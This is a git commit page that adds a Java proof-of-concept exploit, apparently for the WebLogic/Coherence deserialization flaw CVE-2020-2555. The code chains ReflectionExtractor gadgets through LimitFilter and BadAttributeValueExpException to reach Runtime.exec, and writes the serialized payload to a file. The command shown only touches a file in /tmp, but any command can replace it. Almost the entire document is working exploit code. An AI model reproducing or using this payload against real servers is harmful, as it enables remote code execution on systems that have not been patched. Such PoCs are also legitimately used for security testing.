add PoC
This commit is contained in:
parent
1851f4bc3c
commit
587fc0ff09
|
@ -0,0 +1,54 @@
|
||||||
|
import com.tangosol.util.filter.LimitFilter;
|
||||||
|
import com.tangosol.util.extractor.ChainedExtractor;
|
||||||
|
import com.tangosol.util.extractor.ReflectionExtractor;
|
||||||
|
|
||||||
|
import javax.management.BadAttributeValueExpException;
|
||||||
|
import java.io.FileInputStream;
|
||||||
|
import java.io.FileOutputStream;
|
||||||
|
import java.io.ObjectInputStream;
|
||||||
|
import java.io.ObjectOutputStream;
|
||||||
|
import java.lang.reflect.Field;
|
||||||
|
|
||||||
|
/*
|
||||||
|
* BadAttributeValueExpException.readObject()
|
||||||
|
* com.tangosol.util.filter.LimitFilter.toString()
|
||||||
|
* com.tangosol.util.extractor.ChainedExtractor.extract()
|
||||||
|
* com.tangosol.util.extractor.ReflectionExtractor.extract()
|
||||||
|
* Method.invoke()
|
||||||
|
* Runtime.exec()
|
||||||
|
*
|
||||||
|
* PoC by Y4er
|
||||||
|
*/
|
||||||
|
public class Weblogic_2555
|
||||||
|
{
|
||||||
|
public static void main(String args[]) throws Exception
|
||||||
|
{
|
||||||
|
ReflectionExtractor extractor = new ReflectionExtractor("getMethod", new Object[]{ "getRuntime", new Class[0] });
|
||||||
|
ReflectionExtractor extractor2 = new ReflectionExtractor("invoke", new Object[]{ null, new Object[0] });
|
||||||
|
ReflectionExtractor extractor3 = new ReflectionExtractor("exec", new Object[]{ new String[]{ "/bin/sh", "-c", "touch /tmp/blah_ze_blah" } });
|
||||||
|
|
||||||
|
ReflectionExtractor extractors[] = { extractor, extractor2, extractor3 };
|
||||||
|
ChainedExtractor chainedExt = new ChainedExtractor(extractors);
|
||||||
|
LimitFilter limitFilter = new LimitFilter();
|
||||||
|
|
||||||
|
Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
|
||||||
|
m_comparator.setAccessible(true);
|
||||||
|
m_comparator.set(limitFilter, chainedExt);
|
||||||
|
|
||||||
|
Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
|
||||||
|
m_oAnchorTop.setAccessible(true);
|
||||||
|
m_oAnchorTop.set(limitFilter, Runtime.class);
|
||||||
|
|
||||||
|
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
|
||||||
|
Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
|
||||||
|
field.setAccessible(true);
|
||||||
|
field.set(badAttributeValueExpException, limitFilter);
|
||||||
|
|
||||||
|
// Serialize object & save to file
|
||||||
|
FileOutputStream fos = new FileOutputStream("payload_obj.ser");
|
||||||
|
ObjectOutputStream os = new ObjectOutputStream(fos);
|
||||||
|
os.writeObject(badAttributeValueExpException);
|
||||||
|
os.close();
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
Loading…
Reference in New Issue